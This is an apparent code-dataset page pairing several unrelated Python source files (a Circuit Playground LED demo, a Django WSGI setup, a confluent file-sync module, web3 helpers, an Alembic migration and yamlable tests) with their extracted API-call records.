code
stringlengths 22
1.05M
| apis
sequencelengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from adafruit_circuitplayground.express import cpx
# Main loop gets x, y and z axis acceleration, prints the values, and turns on
# red, green and blue, at levels related to the x, y and z values.
while True:
if cpx.switch:
print("Slide switch off!")
cpx.pixels.fill((0, 0, 0))
continue
else:
R = 0
G = 0
B = 0
x, y, z = cpx.acceleration
print((x, y, z))
if x:
R = R + abs(int(x))
if y:
G = G + abs(int(y))
if z:
B = B + abs(int(z))
cpx.pixels.fill((R, G, B))
| [
"adafruit_circuitplayground.express.cpx.pixels.fill"
] | [((272, 298), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (287, 298), False, 'from adafruit_circuitplayground.express import cpx\n'), ((574, 600), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(R, G, B)'], {}), '((R, G, B))\n', (589, 600), False, 'from adafruit_circuitplayground.express import cpx\n')] |
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings")
# django WSGI application
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# load SnapSearch API credentials
api_email = "<email>"
api_key = "<key>"
# initialize the interceptor
from SnapSearch import Client, Detector, Interceptor
interceptor = Interceptor(Client(api_email, api_key), Detector())
# deploy the interceptor
from SnapSearch.wsgi import InterceptorMiddleware
application = InterceptorMiddleware(application, interceptor)
| [
"os.environ.setdefault",
"django.core.wsgi.get_wsgi_application",
"SnapSearch.wsgi.InterceptorMiddleware",
"SnapSearch.Client",
"SnapSearch.Detector"
] | [((11, 82), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""hello_world.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'hello_world.settings')\n", (32, 82), False, 'import os\n'), ((174, 196), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (194, 196), False, 'from django.core.wsgi import get_wsgi_application\n'), ((511, 558), 'SnapSearch.wsgi.InterceptorMiddleware', 'InterceptorMiddleware', (['application', 'interceptor'], {}), '(application, interceptor)\n', (532, 558), False, 'from SnapSearch.wsgi import InterceptorMiddleware\n'), ((381, 407), 'SnapSearch.Client', 'Client', (['api_email', 'api_key'], {}), '(api_email, api_key)\n', (387, 407), False, 'from SnapSearch import Client, Detector, Interceptor\n'), ((409, 419), 'SnapSearch.Detector', 'Detector', ([], {}), '()\n', (417, 419), False, 'from SnapSearch import Client, Detector, Interceptor\n')] |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2021 Lenovo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import tempfile
import confluent.sshutil as sshutil
import confluent.util as util
import confluent.noderange as noderange
import eventlet
import pwd
import grp
def mkdirp(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != 17:
raise
def get_entries(filename):
secname = 'REPLACE:'
filename = filename.strip()
if filename[-1] == '>':
filename = filename[:-1]
with open(filename, 'r') as slfile:
slist = slfile.read()
entries = slist.split('\n')
for ent in entries:
ent = ent.split('#', 1)[0].strip()
if not ent:
continue
if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'):
secname = ent
if ent[0] == '<':
subfilename = ent[1:]
if subfilename[-1] == '>':
subfilename = subfilename[:-1]
if subfilename[0] != '/':
subfilename = os.path.join(os.path.dirname(filename), subfilename)
for subent in get_entries(subfilename):
yield subent
yield secname
else:
yield ent
class SyncList(object):
def __init__(self, filename, nodename, cfg):
slist = None
self.replacemap = {}
self.appendmap = {}
self.appendoncemap = {}
self.mergemap = {}
self.optmap = {}
entries = get_entries(filename)
currmap = self.replacemap
for ent in entries:
try:
cmtidx = ent.index('#')
ent = ent[:cmtidx]
except ValueError:
pass
for special in '$%^&|{}':
if special in ent:
raise Exception(
'Special character "{}" reserved for future use'.format(special))
ent = ent.strip()
if not ent:
continue
if ent[-1] == ':':
if ent == 'MERGE:':
currmap = self.mergemap
elif ent == 'APPENDONCE:':
currmap = self.appendoncemap
elif ent == 'REPLACE:':
currmap = self.replacemap
else:
raise Exception(
'Section "{}" is not currently supported in syncfiles'.format(ent[:-1]))
continue
if '->' in ent:
k, v = ent.split('->')
k = k.strip()
v = v.strip()
if ':' in v:
nr, v = v.split(':', 1)
for candidate in noderange.NodeRange(nr, cfg).nodes:
if candidate == nodename:
break
else:
continue
optparts = v.split()
v = optparts[0]
optparts = optparts[1:]
else:
kparts = []
optparts = []
currparts = kparts
for part in ent.split():
if part[0] == '(':
currparts = optparts
currparts.append(part)
k = ' '.join(kparts)
v = None
entopts = {}
if optparts:
if optparts[0][0] != '(' or optparts[-1][-1] != ')':
raise Exception("Unsupported syntax in syncfile: " + ent)
opts = ','.join(optparts)
opts = opts[1:-1]
for opt in opts.split(','):
optname, optval = opt.split('=')
if optname == 'owner':
try:
uid = pwd.getpwnam(optval).pw_uid
except KeyError:
uid = None
optval = {'name': optval, 'id': uid}
elif optname == 'group':
try:
gid = grp.getgrnam(optval).gr_gid
except KeyError:
gid = None
optval = {'name': optval, 'id': gid}
entopts[optname] = optval
currmap[k] = v
targ = v if v else k
for f in targ.split():
self.optmap[f] = entopts
def sync_list_to_node(sl, node, suffixes):
targdir = tempfile.mkdtemp('.syncto{}'.format(node))
output = ''
try:
for ent in sl.replacemap:
stage_ent(sl.replacemap, ent, targdir)
if 'append' in suffixes:
while suffixes['append'] and suffixes['append'][0] == '/':
suffixes['append'] = suffixes['append'][1:]
for ent in sl.appendmap:
stage_ent(sl.appendmap, ent,
os.path.join(targdir, suffixes['append']))
if 'merge' in suffixes:
while suffixes['merge'] and suffixes['merge'][0] == '/':
suffixes['merge'] = suffixes['merge'][1:]
for ent in sl.mergemap:
stage_ent(sl.mergemap, ent,
os.path.join(targdir, suffixes['merge']), True)
if 'appendonce' in suffixes:
while suffixes['appendonce'] and suffixes['appendonce'][0] == '/':
suffixes['appendonce'] = suffixes['appendonce'][1:]
for ent in sl.appendoncemap:
stage_ent(sl.appendoncemap, ent,
os.path.join(targdir, suffixes['appendonce']), True)
sshutil.prep_ssh_key('/etc/confluent/ssh/automation')
output = util.run(
['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0]
except Exception as e:
if 'CalledProcessError' not in repr(e):
# https://github.com/eventlet/eventlet/issues/413
# for some reason, can't catch the calledprocesserror normally
# for this exception, implement a hack workaround
raise
unreadablefiles = []
for root, dirnames, filenames in os.walk(targdir):
for filename in filenames:
filename = os.path.join(root, filename)
try:
with open(filename, 'r') as _:
pass
except OSError as e:
unreadablefiles.append(filename.replace(targdir, ''))
if unreadablefiles:
raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles))
else:
raise
finally:
shutil.rmtree(targdir)
if not isinstance(output, str):
output = output.decode('utf8')
retval = {
'options': sl.optmap,
'output': output,
}
return retval # need dictionary with output and options
def stage_ent(currmap, ent, targdir, appendexist=False):
dst = currmap[ent]
everyfent = []
allfents = ent.split()
for tmpent in allfents:
fents = glob.glob(tmpent)
everyfent.extend(fents)
if not everyfent:
raise Exception('No matching files for "{}"'.format(ent))
if dst is None: # this is to indicate source and destination as one
dst = os.path.dirname(everyfent[0]) + '/'
while dst and dst[0] == '/':
dst = dst[1:]
if len(everyfent) > 1 and dst[-1] != '/':
raise Exception(
'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst))
fulltarg = os.path.join(targdir, dst)
for targ in everyfent:
mkpathorlink(targ, fulltarg, appendexist)
def mkpathorlink(source, destination, appendexist=False):
if os.path.isdir(source):
mkdirp(destination)
for ent in os.listdir(source):
currsrc = os.path.join(source, ent)
currdst = os.path.join(destination, ent)
mkpathorlink(currsrc, currdst)
else:
if destination[-1] == '/':
mkdirp(destination)
destination = os.path.join(destination, os.path.basename(source))
else:
mkdirp(os.path.dirname(destination))
if appendexist and os.path.exists(destination):
tmpnam = tempfile.mktemp()
shutil.copy(destination, tmpnam)
os.remove(destination)
with open(destination, 'w') as realdest:
with open(tmpnam) as olddest:
realdest.write(olddest.read())
with open(source) as sourcedata:
realdest.write(sourcedata.read())
os.remove(tmpnam)
else:
os.symlink(source, destination)
syncrunners = {}
def start_syncfiles(nodename, cfg, suffixes):
deployinfo = cfg.get_node_attributes(
nodename, ('deployment.*',))
deployinfo = deployinfo.get(nodename, {})
profile = deployinfo.get(
'deployment.pendingprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.stagedprofile', {}).get('value', '')
if not profile:
profile = deployinfo.get(
'deployment.profile', {}).get('value', '')
if not profile:
raise Exception('Cannot perform syncfiles without profile assigned')
synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile)
if not os.path.exists(synclist):
return '200 OK' # not running
sl = SyncList(synclist, nodename, cfg)
if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap):
return '200 OK' # the synclist has no actual entries
syncrunners[nodename] = eventlet.spawn(
sync_list_to_node, sl, nodename, suffixes)
return '202 Queued' # backgrounded
def get_syncresult(nodename):
if nodename not in syncrunners:
return ('204 Not Running', '')
if not syncrunners[nodename].dead:
return ('200 OK', '')
result = syncrunners[nodename].wait()
del syncrunners[nodename]
return ('200 OK', result)
| [
"os.walk",
"os.remove",
"os.path.exists",
"os.listdir",
"pwd.getpwnam",
"os.path.isdir",
"glob.glob",
"confluent.sshutil.prep_ssh_key",
"os.path.dirname",
"shutil.copy",
"confluent.noderange.NodeRange",
"grp.getgrnam",
"os.makedirs",
"eventlet.spawn",
"os.path.join",
"os.symlink",
"tempfile.mktemp",
"os.path.basename",
"shutil.rmtree"
] | [((8126, 8152), 'os.path.join', 'os.path.join', (['targdir', 'dst'], {}), '(targdir, dst)\n', (8138, 8152), False, 'import os\n'), ((8296, 8317), 'os.path.isdir', 'os.path.isdir', (['source'], {}), '(source)\n', (8309, 8317), False, 'import os\n'), ((10220, 10277), 'eventlet.spawn', 'eventlet.spawn', (['sync_list_to_node', 'sl', 'nodename', 'suffixes'], {}), '(sync_list_to_node, sl, nodename, suffixes)\n', (10234, 10277), False, 'import eventlet\n'), ((848, 865), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (859, 865), False, 'import os\n'), ((6186, 6239), 'confluent.sshutil.prep_ssh_key', 'sshutil.prep_ssh_key', (['"""/etc/confluent/ssh/automation"""'], {}), "('/etc/confluent/ssh/automation')\n", (6206, 6239), True, 'import confluent.sshutil as sshutil\n'), ((7211, 7233), 'shutil.rmtree', 'shutil.rmtree', (['targdir'], {}), '(targdir)\n', (7224, 7233), False, 'import shutil\n'), ((7617, 7634), 'glob.glob', 'glob.glob', (['tmpent'], {}), '(tmpent)\n', (7626, 7634), False, 'import glob\n'), ((8366, 8384), 'os.listdir', 'os.listdir', (['source'], {}), '(source)\n', (8376, 8384), False, 'import os\n'), ((9943, 9967), 'os.path.exists', 'os.path.exists', (['synclist'], {}), '(synclist)\n', (9957, 9967), False, 'import os\n'), ((6705, 6721), 'os.walk', 'os.walk', (['targdir'], {}), '(targdir)\n', (6712, 6721), False, 'import os\n'), ((7842, 7871), 'os.path.dirname', 'os.path.dirname', (['everyfent[0]'], {}), '(everyfent[0])\n', (7857, 7871), False, 'import os\n'), ((8408, 8433), 'os.path.join', 'os.path.join', (['source', 'ent'], {}), '(source, ent)\n', (8420, 8433), False, 'import os\n'), ((8456, 8486), 'os.path.join', 'os.path.join', (['destination', 'ent'], {}), '(destination, ent)\n', (8468, 8486), False, 'import os\n'), ((8775, 8802), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (8789, 8802), False, 'import os\n'), ((8825, 8842), 'tempfile.mktemp', 'tempfile.mktemp', ([], {}), '()\n', (8840, 8842), False, 'import tempfile\n'), ((8855, 8887), 'shutil.copy', 'shutil.copy', (['destination', 'tmpnam'], {}), '(destination, tmpnam)\n', (8866, 8887), False, 'import shutil\n'), ((8900, 8922), 'os.remove', 'os.remove', (['destination'], {}), '(destination)\n', (8909, 8922), False, 'import os\n'), ((9188, 9205), 'os.remove', 'os.remove', (['tmpnam'], {}), '(tmpnam)\n', (9197, 9205), False, 'import os\n'), ((9232, 9263), 'os.symlink', 'os.symlink', (['source', 'destination'], {}), '(source, destination)\n', (9242, 9263), False, 'import os\n'), ((8659, 8683), 'os.path.basename', 'os.path.basename', (['source'], {}), '(source)\n', (8675, 8683), False, 'import os\n'), ((8718, 8746), 'os.path.dirname', 'os.path.dirname', (['destination'], {}), '(destination)\n', (8733, 8746), False, 'import os\n'), ((1601, 1626), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1616, 1626), False, 'import os\n'), ((5469, 5510), 'os.path.join', 'os.path.join', (['targdir', "suffixes['append']"], {}), "(targdir, suffixes['append'])\n", (5481, 5510), False, 'import os\n'), ((5777, 5817), 'os.path.join', 'os.path.join', (['targdir', "suffixes['merge']"], {}), "(targdir, suffixes['merge'])\n", (5789, 5817), False, 'import os\n'), ((6125, 6170), 'os.path.join', 'os.path.join', (['targdir', "suffixes['appendonce']"], {}), "(targdir, suffixes['appendonce'])\n", (6137, 6170), False, 'import os\n'), ((6789, 6817), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (6801, 6817), False, 'import os\n'), ((3252, 3280), 'confluent.noderange.NodeRange', 'noderange.NodeRange', (['nr', 'cfg'], {}), '(nr, cfg)\n', (3271, 3280), True, 'import confluent.noderange as noderange\n'), ((4357, 4377), 'pwd.getpwnam', 'pwd.getpwnam', (['optval'], {}), '(optval)\n', (4369, 4377), False, 'import pwd\n'), ((4634, 4654), 'grp.getgrnam', 'grp.getgrnam', (['optval'], {}), '(optval)\n', (4646, 4654), False, 'import grp\n')] |
import json
import os
from argparse import ArgumentTypeError
from eth_typing import Address
from web3.contract import Contract
from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR
async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool:
statuses = [True]
try:
if status_init:
for c in contracts:
# Use different cloud_addresses for each contract instance
cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation()
c.set_cloud_sla_address(cloud_address)
statuses.append(cloud_status_ok)
if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file':
statuses.append(await c.upload())
if fn == 'file_check_undeleted_file':
statuses.append(await c.read())
if fn == 'corrupted_file_check':
statuses.append(await c.another_file_upload_read())
if fn == 'delete':
for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1):
statuses.append(await c.upload())
else:
for c in contracts:
if fn == 'delete':
if c.tx_upload_count < round(factor / DEPLOYED_CONTRACTS) + 1:
for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))):
statuses.append(await c.upload())
except ValueError as v:
print(f'{type(v)} [init_sim]: {v}')
else:
return check_statuses(statuses)
def get_credentials(blockchain: str) -> tuple:
if blockchain == 'polygon':
from settings import (
polygon_private_keys
)
return polygon_private_keys
from settings import (
quorum_private_keys
)
return quorum_private_keys
def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract:
def get_abi(path: str) -> list:
with open(path) as file:
contract_json = json.load(file)
contract_abi = contract_json['abi']
return contract_abi
abi = get_abi(compiled_contract_path)
contract = w3.eth.contract(address=address, abi=abi)
return contract
def check_statuses(statuses: []) -> bool:
for idx in range(len(statuses)):
if statuses[idx] == 0:
return False
return True
def exists_mkdir(paths: []):
for path in paths:
if not os.path.exists(path):
os.mkdir(path)
def get_contracts_config(blockchain: str, msg: bool = True):
if msg:
print('Retrieve config file...')
filename = f'{blockchain}.json'
filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename)
with open(filepath) as file:
contracts_summary = json.loads(file.read())
if msg:
print(f'Config file retrieved at {filepath}.')
return contracts_summary
def range_limited_val(arg: str) -> int:
"""
Type function for argparse - int within some predefined bounds.
"""
try:
s = int(arg)
except ValueError:
raise ArgumentTypeError("must be a int number")
if s < MIN_VAL or s > MAX_VAL:
raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}")
return s
| [
"os.path.exists",
"argparse.ArgumentTypeError",
"os.getcwd",
"os.mkdir",
"json.load"
] | [((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((2125, 2140), 'json.load', 'json.load', (['file'], {}), '(file)\n', (2134, 2140), False, 'import json\n'), ((2560, 2580), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2574, 2580), False, 'import os\n'), ((2594, 2608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2602, 2608), False, 'import os\n'), ((3198, 3239), 'argparse.ArgumentTypeError', 'ArgumentTypeError', (['"""must be a int number"""'], {}), "('must be a int number')\n", (3215, 3239), False, 'from argparse import ArgumentTypeError\n')] |
"""add topics
Revision ID: 816ea3631582
Revises: <KEY>
Create Date: 2021-03-13 14:20:10.044131
"""
from alembic import op
import sqlalchemy as sa
import bot
# revision identifiers, used by Alembic.
revision = "816ea3631582"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"topics",
sa.Column("content", sa.Text(), nullable=False),
sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True),
sa.PrimaryKeyConstraint("content"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("topics")
# ### end Alembic commands ###
| [
"alembic.op.drop_table",
"sqlalchemy.PrimaryKeyConstraint",
"bot.database.TIMESTAMP",
"sqlalchemy.Text"
] | [((735, 758), 'alembic.op.drop_table', 'op.drop_table', (['"""topics"""'], {}), "('topics')\n", (748, 758), False, 'from alembic import op\n'), ((569, 603), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""content"""'], {}), "('content')\n", (592, 603), True, 'import sqlalchemy as sa\n'), ((442, 451), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (449, 451), True, 'import sqlalchemy as sa\n'), ((506, 543), 'bot.database.TIMESTAMP', 'bot.database.TIMESTAMP', ([], {'timezone': '(True)'}), '(timezone=True)\n', (528, 543), False, 'import bot\n')] |
from copy import copy
try:
# Python 2 only:
from StringIO import StringIO
# create a variant that can serve as a context manager
class StringIO(StringIO):
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
except ImportError:
from io import StringIO
try: # python 3.5+
from typing import Dict, Any
from yamlable import Y
except ImportError:
pass
import pytest
from yaml import dump, load
from yamlable import YamlAble, yaml_info
def test_yamlable_incomplete_description():
""" Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """
with pytest.raises(NotImplementedError) as err_info:
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo'
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo()
# dump
f.dumps_yaml()
assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value)
def test_yamlable():
""" Tests that YamlAble works correctly """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo(**dct)
# instantiate
f = Foo(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.Foo
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == Foo.loads_yaml(y)
# load io
assert f == Foo.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
def test_yamlable_legacy_method_names():
""" Tests that YamlAbleMixIn works correctly """
global enc
global dec
enc, dec = False, False
@yaml_info(yaml_tag_ns='yaml.tests')
class FooLegacy(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def to_yaml_dict(self):
# type: (...) -> Dict[str, Any]
global enc
enc = True
return copy(vars(self))
@classmethod
def from_yaml_dict(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
global dec
dec = True
return FooLegacy(**dct)
# instantiate
f = FooLegacy(1, 'hello')
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooLegacy
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooLegacy.loads_yaml(y)
# load io
assert f == FooLegacy.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
assert enc
assert dec
# TODO override so that tag is not supported, to check error message
def test_yamlable_not_supported():
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Err(YamlAble):
# __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
def __to_yaml_dict__(self):
# type: (...) -> Dict[str, Any]
return copy(vars(self))
@classmethod
def __from_yaml_dict__(cls, # type: Type[Y]
dct, # type: Dict[str, Any]
yaml_tag # type: str
):
# type: (...) -> Y
return Foo_Err(**dct)
@classmethod
def is_yaml_tag_supported(cls,
yaml_tag # type: str
):
# type: (...) -> bool
# ALWAYS return false
return False
with pytest.raises(TypeError) as err_info:
Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n")
assert "No YamlAble subclass found able to decode object" in str(err_info.value)
def test_yamlable_default_impl():
""" tests that the default implementation works """
@yaml_info(yaml_tag_ns='yaml.tests')
class Foo_Default(YamlAble):
def __init__(self, a, b):
self.a = a
self.b = b
f = Foo_Default(1, 'hello')
s = """!yamlable/yaml.tests.Foo_Default
a: 1
b: hello
"""
assert dump(f, default_flow_style=False) == s
assert dump(load(dump(load(s))), default_flow_style=False) == s
def test_help_yaml_info():
@yaml_info("com.example.MyFoo")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo"
@yaml_info(yaml_tag_ns="com.example")
class Foo(YamlAble):
pass
assert Foo.__yaml_tag_suffix__ == "com.example.Foo"
assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {}
"""
def test_abstract_parent_error():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooE(YamlAble):
pass
class FooError(AbstractFooE):
"""
This class inherits from the parent without redefining a yaml tag
"""
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
e = FooError(1, 'hello')
# dump
with pytest.raises(NotImplementedError):
e.dumps_yaml()
def test_abstract_parent():
"""This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it"""
class AbstractFooV(YamlAble):
pass
@yaml_info(yaml_tag_ns='yaml.tests')
class FooValid(AbstractFooV):
def __init__(self, a, b):
self.a = a
self.b = b
def __eq__(self, other):
return vars(self) == vars(other)
# instantiate
f = FooValid(1, 'hello') # note:
# dump
y = f.dumps_yaml(default_flow_style=False)
assert y == """!yamlable/yaml.tests.FooValid
a: 1
b: hello
"""
# dump io
class MemorizingStringIO(StringIO):
""" A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """
def close(self):
self.value = self.getvalue()
# super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one)
StringIO.close(self)
s = MemorizingStringIO()
f.dump_yaml(s, default_flow_style=False)
assert s.value == y
# dump pyyaml
assert dump(f, default_flow_style=False) == y
# load
assert f == FooValid.loads_yaml(y)
# load io
assert f == FooValid.load_yaml(StringIO(y))
# load pyyaml
assert f == load(y)
| [
"yaml.dump",
"yaml.load",
"pytest.raises",
"io.StringIO.close",
"io.StringIO",
"yamlable.yaml_info"
] | [((1534, 1569), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (1543, 1569), False, 'from yamlable import YamlAble, yaml_info\n'), ((3261, 3296), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (3270, 3296), False, 'from yamlable import YamlAble, yaml_info\n'), ((5081, 5116), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (5090, 5116), False, 'from yamlable import YamlAble, yaml_info\n'), ((6338, 6373), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (6347, 6373), False, 'from yamlable import YamlAble, yaml_info\n'), ((6736, 6766), 'yamlable.yaml_info', 'yaml_info', (['"""com.example.MyFoo"""'], {}), "('com.example.MyFoo')\n", (6745, 6766), False, 'from yamlable import YamlAble, yaml_info\n'), ((6870, 6906), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""com.example"""'}), "(yaml_tag_ns='com.example')\n", (6879, 6906), False, 'from yamlable import YamlAble, yaml_info\n'), ((7876, 7911), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (7885, 7911), False, 'from yamlable import YamlAble, yaml_info\n'), ((721, 755), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (734, 755), False, 'import pytest\n'), ((2914, 2947), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (2918, 2947), False, 'from yaml import dump, load\n'), ((3092, 3099), 'yaml.load', 'load', (['y'], {}), '(y)\n', (3096, 3099), False, 'from yaml import dump, load\n'), ((4740, 4773), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (4744, 4773), False, 'from yaml import dump, load\n'), ((4930, 4937), 'yaml.load', 'load', (['y'], {}), '(y)\n', (4934, 4937), False, 'from yaml import dump, load\n'), ((6038, 6062), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6051, 6062), False, 'import pytest\n'), ((6593, 6626), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (6597, 6626), False, 'from yaml import dump, load\n'), ((7625, 7659), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (7638, 7659), False, 'import pytest\n'), ((8805, 8838), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (8809, 8838), False, 'from yaml import dump, load\n'), ((8993, 9000), 'yaml.load', 'load', (['y'], {}), '(y)\n', (8997, 9000), False, 'from yaml import dump, load\n'), ((2764, 2784), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (2778, 2784), False, 'from io import StringIO\n'), ((3044, 3055), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (3052, 3055), False, 'from io import StringIO\n'), ((4590, 4610), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (4604, 4610), False, 'from io import StringIO\n'), ((4882, 4893), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (4890, 4893), False, 'from io import StringIO\n'), ((8655, 8675), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (8669, 8675), False, 'from io import StringIO\n'), ((8945, 8956), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (8953, 8956), False, 'from io import StringIO\n'), ((6659, 6666), 'yaml.load', 'load', (['s'], {}), '(s)\n', (6663, 6666), False, 'from yaml import dump, load\n')] |
# -*- test-case-name: twisted.web.test.test_web -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a web server which integrates with the twisted.internet infrastructure.
@var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render}
implementations can return to indicate that the application will later call
C{.write} and C{.finish} to complete the request, and that the HTTP
connection should be left open.
@type NOT_DONE_YET: Opaque; do not depend on any particular type for this
value.
"""
import copy
import os
import re
from html import escape
from typing import List, Optional
from urllib.parse import quote as _quote
import zlib
from binascii import hexlify
